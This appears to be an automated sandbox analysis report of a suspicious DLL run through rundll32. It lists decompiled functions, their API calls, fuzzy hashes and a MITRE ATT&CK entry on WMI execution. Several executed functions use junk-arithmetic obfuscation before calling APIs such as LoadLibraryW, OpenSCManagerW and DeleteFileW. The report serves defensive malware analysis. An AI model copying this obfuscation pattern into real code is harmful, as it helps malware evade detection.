Function 10001E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E10001E20(void* _a4, intOrPtr _a8) {
				signed int _t3;

				_t3 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				asm("sbb eax, eax");
				return _t3 *  *0x100440cc + _a8 + 1;
			}

0x10001e38
0x10001e4d
0x10001e50

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E38

Strings

xadqsavcbdfewescGADW, xrefs: 10001E25
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001E2C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
Instruction ID: 3fdeccdcda24fa04b64c34d0073cfd5bdbdd3e77499752cdea2f7536024f9e24
Opcode Fuzzy Hash: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
Instruction Fuzzy Hash: 2DD0C931298311BAE2059B60CD86F86B794E756B07F01C514F345EE4D1C7B090848A25

Uniqueness

Uniqueness Score: -1.00%

Function 10003854 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 12
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003854(void* __ecx) {

				E1000EE6D(__ecx, 0x3e9, "Mundo Hola");
				return SendMessageA( *(__ecx + 0xe8), 0x143, 0, "Hola Mundo");
			}

0x10003861
0x1000387f

APIs

Part of subcall function 1000EE6D: SetDlgItemTextA.USER32 ref: 1000EE7E

SendMessageA.USER32 ref: 10003878

Strings

Hola Mundo, xrefs: 10003866
Mundo Hola, xrefs: 10003855

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ItemMessageSendText
String ID: Hola Mundo$Mundo Hola
API String ID: 77679052-617527613
Opcode ID: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
Instruction ID: 1811b1191abaef19ada81be914ca39904a3dc6a32a47f6b2494c466348ef455e
Opcode Fuzzy Hash: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
Instruction Fuzzy Hash: D2C080301403A07FF5226250FC06FCA5910CB05753F008501730D7D0D18B5139804640

Uniqueness

Uniqueness Score: -1.00%

Function 10011382 Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E10011382(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E10004E6E(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x10048670 == 0) {
					_t4 = E1001135E();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x10048828 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x10048810);
					if( *_t15 == 0) {
						_t4 = 0x10048678 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x10048810);
				}
				EnterCriticalSection(0x10048678 + _t11 * 0x18);
				return _t4;
			}

APIs

EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
Instruction ID: 2a1b714fc97c26e45b6e87192a60087c5aec0faa5666cee140badcbafd2b3ba5
Opcode Fuzzy Hash: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
Instruction Fuzzy Hash: BFF0F6735001288FD6409F54CC8475DB7AAFB82395F56482AE1508A056CF31D681C769

Uniqueness

Uniqueness Score: -1.00%

Function 100105F0 Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100105F0(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x10048600
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

APIs

EnterCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 100105F9
TlsGetValue.KERNEL32(100485E4,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001060E
LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 10010624
LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001062F

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
Instruction ID: 62d6a443bb2e53cdd0c433372c742529333c02fcab520335ef35924ea7a93314
Opcode Fuzzy Hash: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
Instruction Fuzzy Hash: C2F0127A3005109FD321CF64CC8884A73E9FFC839171A8866F8819B123DB71F895CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 3340, Parent PID: 1212COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	279
Total number of Limit Nodes:	10

Executed Functions

Function 04CEF6A1 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E04CEF6A1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t31;
				struct HINSTANCE__* _t37;
				WCHAR* _t40;

				_push(_a12);
				_t40 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04CE32C4(_t31);
				_v28 = 0xc52aa;
				_v24 = 0x95615;
				_v20 = 0x738ab;
				_v16 = 0x613b6f;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x0c263f45;
				_v8 = 0x987e64;
				_v8 = _v8 + 0xffff93dc;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x46a8;
				_v8 = _v8 ^ 0x00098c86;
				_v12 = 0x302d8a;
				_v12 = _v12 << 0xe;
				_v12 = _v12 | 0xe7847ef7;
				_v12 = _v12 ^ 0xefed21e1;
				E04CD52F2(__ecx, __edx, __ecx, 0xa2, 0xef13742b, 0x9f49d153);
				_t37 = LoadLibraryW(_t40); // executed
				return _t37;
			}

0x04cef6a8
0x04cef6ab
0x04cef6ad
0x04cef6b0
0x04cef6b3
0x04cef6b4
0x04cef6b5
0x04cef6ba
0x04cef6c4
0x04cef6cb
0x04cef6d2
0x04cef6d9
0x04cef6dd
0x04cef6e4
0x04cef6eb
0x04cef6f2
0x04cef6f6
0x04cef6fd
0x04cef704
0x04cef70b
0x04cef70f
0x04cef716
0x04cef736
0x04cef73f
0x04cef745

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 04CEF73F

Strings

!, xrefs: 04CEF716
CJD, xrefs: 04CEF6A1
o;a, xrefs: 04CEF6D2

Memory Dump Source

Source File: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true

Associated: 00000004.00000002.256592950.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.256638176.0000000004CF2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4cd0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: o;a$!$CJD
API String ID: 1029625771-3784180784
Opcode ID: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
Instruction ID: 32ca31672a13700b150bb020ca47ecc4fe51dccf96467651c21f97da35a98c35
Opcode Fuzzy Hash: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
Instruction Fuzzy Hash: FE1112B6C01308BBCB01EFA4C80989EBBB4EB10318F508088E91566251E3B99B58DF91

Uniqueness

Uniqueness Score: -1.00%

Function 04CE7E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E04CE7E14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t33;
				void* _t40;

				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E04CE32C4(_t33);
				_v28 = 0x38698;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0xf80068;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0x9c2a;
				_v12 = _v12 ^ 0xf804c3a3;
				_v8 = 0xd3ebc3;
				_v8 = _v8 << 0x10;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x000f62ee;
				_v16 = 0x690a65;
				_v16 = _v16 | 0xebc01c25;
				_v16 = _v16 ^ 0xebe7ec5f;
				E04CD52F2(__ecx, __edx, __ecx, 0x184, 0x21b856d, 0x2217af3d);
				_t40 = OpenSCManagerW(0, 0, _a20); // executed
				return _t40;
			}

0x04ce7e1b
0x04ce7e20
0x04ce7e23
0x04ce7e24
0x04ce7e27
0x04ce7e2a
0x04ce7e2b
0x04ce7e2c
0x04ce7e31
0x04ce7e3b
0x04ce7e3e
0x04ce7e41
0x04ce7e48
0x04ce7e4c
0x04ce7e53
0x04ce7e5a
0x04ce7e61
0x04ce7e65
0x04ce7e7d
0x04ce7e80
0x04ce7e87
0x04ce7e8e
0x04ce7e95
0x04ce7ea5
0x04ce7eb2
0x04ce7eb8

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00038698,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04CE7EB2

Strings

_, xrefs: 04CE7E95

Memory Dump Source

Source File: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true

Associated: 00000004.00000002.256592950.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.256638176.0000000004CF2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4cd0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: _
API String ID: 1889721586-4005583852
Opcode ID: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
Instruction ID: d76cdbe992e9b59858d1f7221fe15da8cfdacb095d1a742569a481fc553633de
Opcode Fuzzy Hash: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
Instruction Fuzzy Hash: 561133B1C01218BBDF01DF99D80A8DEBFB9EF04344F108089E915A2251D3B68B24EB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CD2CC4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E04CD2CC4(void* __ecx, void* __edx, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t35;
				void* _t42;
				void* _t45;

				_push(_a16);
				_t45 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04CE32C4(_t35);
				_v20 = 0xfe94d;
				_v16 = 0xab1c4;
				_v16 = 0x50de48;
				_v16 = _v16 * 0x6c;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0xc664fcf6;
				_v8 = 0xfaad6e;
				_v8 = _v8 << 0xf;
				_v8 = _v8 + 0xffffd3fa;
				_v8 = _v8 ^ 0xf4e1ffa5;
				_v8 = _v8 ^ 0xa25eb8a6;
				_v12 = 0xe37a21;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xd10447cc;
				E04CD52F2(__ecx, __edx, __ecx, 0x11b, 0x94519920, 0x9f49d153);
				_t42 = RtlAllocateHeap(_t45, _a4, _a12); // executed
				return _t42;
			}

0x04cd2ccb
0x04cd2cce
0x04cd2cd0
0x04cd2cd3
0x04cd2cd6
0x04cd2cd9
0x04cd2cda
0x04cd2cdb
0x04cd2ce0
0x04cd2cea
0x04cd2cf1
0x04cd2d0c
0x04cd2d0f
0x04cd2d13
0x04cd2d1a
0x04cd2d21
0x04cd2d25
0x04cd2d2c
0x04cd2d33
0x04cd2d3a
0x04cd2d41
0x04cd2d45
0x04cd2d49
0x04cd2d59
0x04cd2d68
0x04cd2d6e

APIs

RtlAllocateHeap.NTDLL(?,D10447CC,000FE94D), ref: 04CD2D68

Strings

!z, xrefs: 04CD2D3A

Memory Dump Source

Source File: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true

Associated: 00000004.00000002.256592950.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.256638176.0000000004CF2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4cd0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: !z
API String ID: 1279760036-1244814218
Opcode ID: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
Instruction ID: e08374a8ba9f61c6ff235dd03007c83a1d3666ceac2fadbb149db07c1713f538
Opcode Fuzzy Hash: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
Instruction Fuzzy Hash: 0E11DFB2C04208BBDB01EFE5D94A8DEBFB5EF45304F108488E92566252D3759B24EF90

Uniqueness

Uniqueness Score: -1.00%

Function 04CE58BD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E04CE58BD(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t35;
				WCHAR* _t38;

				_push(_a4);
				_t38 = __ecx;
				_push(__edx);
				_push(__ecx);
				E04CE32C4(_t27);
				_v16 = 0x13586;
				_v16 = 0x4c59cc;
				_v16 = _v16 ^ 0xe50d706a;
				_v16 = _v16 ^ 0xe54f7d54;
				_v12 = 0x3bf9e4;
				_v12 = _v12 + 0x106;
				_v12 = _v12 * 0x7a;
				_v12 = _v12 ^ 0x1c92743a;
				_v8 = 0x406212;
				_v8 = _v8 * 0x60;
				_v8 = _v8 + 0xffffd8c7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x000758b5;
				E04CD52F2(__ecx, __edx, __ecx, 0x1f5, 0x7518e659, 0x9f49d153);
				_t35 = DeleteFileW(_t38); // executed
				return _t35;
			}

0x04ce58c4
0x04ce58c7
0x04ce58c9
0x04ce58ca
0x04ce58cb
0x04ce58d0
0x04ce58da
0x04ce58e1
0x04ce58e8
0x04ce58ef
0x04ce58f6
0x04ce5911
0x04ce5914
0x04ce591b
0x04ce5926
0x04ce5929
0x04ce5930
0x04ce5934
0x04ce5944
0x04ce594d
0x04ce5953

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04CE594D

Strings

T}O, xrefs: 04CE58E8

Memory Dump Source

Source File: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true

Associated: 00000004.00000002.256592950.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.256638176.0000000004CF2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4cd0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: T}O
API String ID: 4033686569-2430299532
Opcode ID: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
Instruction ID: 150d7fc6bafda5cd15f06a100e64b38b12c69ab236cd86dfafe8f97bfeff5d02
Opcode Fuzzy Hash: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
Instruction Fuzzy Hash: 6D0102B5D01208FBDB04DFA9D9469DEBFB4EB00318F20C199E514B7250E7B82B549F95

Uniqueness

Uniqueness Score: -1.00%

Function 04CE602C Relevance: 1.6, APIs: 1, Instructions: 66
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E04CE602C(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t42;
				void* _t50;
				signed int _t53;
				long _t57;
				long _t58;

				_t58 = __edx;
				_push(0);
				_push(_a36);
				_t57 = __ecx;
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04CE32C4(_t42);
				_v32 = 0xf2bcc;
				_v28 = 0x9963f;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0x481e97;
				_v12 = _v12 + 0x3bb9;
				_v12 = _v12 | 0xe5ca697e;
				_v12 = _v12 ^ 0xe5cf84b6;
				_v8 = 0xca7b5c;
				_t53 = 0x38;
				_v8 = _v8 / _t53;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x0004807b;
				_v16 = 0xf3cd85;
				_v16 = _v16 ^ 0x0b7576d7;
				_v16 = _v16 ^ 0x0b87a2f8;
				E04CD52F2(_t53, _v8 % _t53, _t53, 0xf4, 0xbdcc8d36, 0x9f49d153);
				_t50 = CreateFileW(_a24, _a20, _a12, 0, _t57, _t58, 0); // executed
				return _t50;
			}

0x04ce6037
0x04ce6039
0x04ce603a
0x04ce603d
0x04ce603f
0x04ce6040
0x04ce6043
0x04ce6046
0x04ce6049
0x04ce604c
0x04ce604f
0x04ce6052
0x04ce6055
0x04ce6056
0x04ce6057
0x04ce605c
0x04ce6066
0x04ce606f
0x04ce6072
0x04ce6075
0x04ce607c
0x04ce6083
0x04ce608a
0x04ce6091
0x04ce609d
0x04ce60a5
0x04ce60a8
0x04ce60ac
0x04ce60b3
0x04ce60ba
0x04ce60c1
0x04ce60dc
0x04ce60f1
0x04ce60f9

APIs

CreateFileW.KERNEL32(000F2BCC,0009963F,911404DD,00000000,?,00000000,00000000), ref: 04CE60F1

Memory Dump Source

Source File: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true

Associated: 00000004.00000002.256592950.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.256638176.0000000004CF2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4cd0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
Instruction ID: 432bdafd6f3b507578eba942922d15aff4bf81b80bc174463b52dd69226e7ebc
Opcode Fuzzy Hash: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
Instruction Fuzzy Hash: A921F57290020DBFDF05DF95DC858AFBFB9EB44358F108498FA14A6220D7764A65AB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CF08C3 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04CF08C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t32;
				void* _t33;

				_v20 = 0xba35d;
				_v16 = 0x2c63f;
				_v8 = 0x18668b;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x77;
				_v8 = _v8 + 0xffff88d8;
				_v8 = _v8 ^ 0xabd92865;
				_v12 = 0xa923ab;
				_v12 = _v12 + 0xffffe870;
				_v12 = _v12 ^ 0x2e66d6cd;
				_v12 = _v12 ^ 0x2eca4b61;
				_v16 = 0xa7f2df;
				_v16 = _v16 + 0xffff74c1;
				_v16 = _v16 ^ 0x00a03459;
				E04CD52F2(_t32, _t33, _t32, 0xc1, 0x82522eb8, 0x9f49d153);
				ExitProcess(0);
			}

0x04cf08c9
0x04cf08d0
0x04cf08d7
0x04cf08de
0x04cf08f6
0x04cf08f9
0x04cf0900
0x04cf0907
0x04cf090e
0x04cf0915
0x04cf091c
0x04cf0923
0x04cf092a
0x04cf0931
0x04cf0941
0x04cf094b

APIs

ExitProcess.KERNEL32(00000000), ref: 04CF094B

Memory Dump Source

Source File: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true

Associated: 00000004.00000002.256592950.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.256638176.0000000004CF2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4cd0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
Instruction ID: 0be3fa6889625a05c3acad1b0f66326abd73168981fb42fd3d9efcbc1c8593bf
Opcode Fuzzy Hash: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
Instruction Fuzzy Hash: 690100B1D4130CFBDB44DFE9E98A99DBBB0EB10714F2081899824B7290D3B81B549F44

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

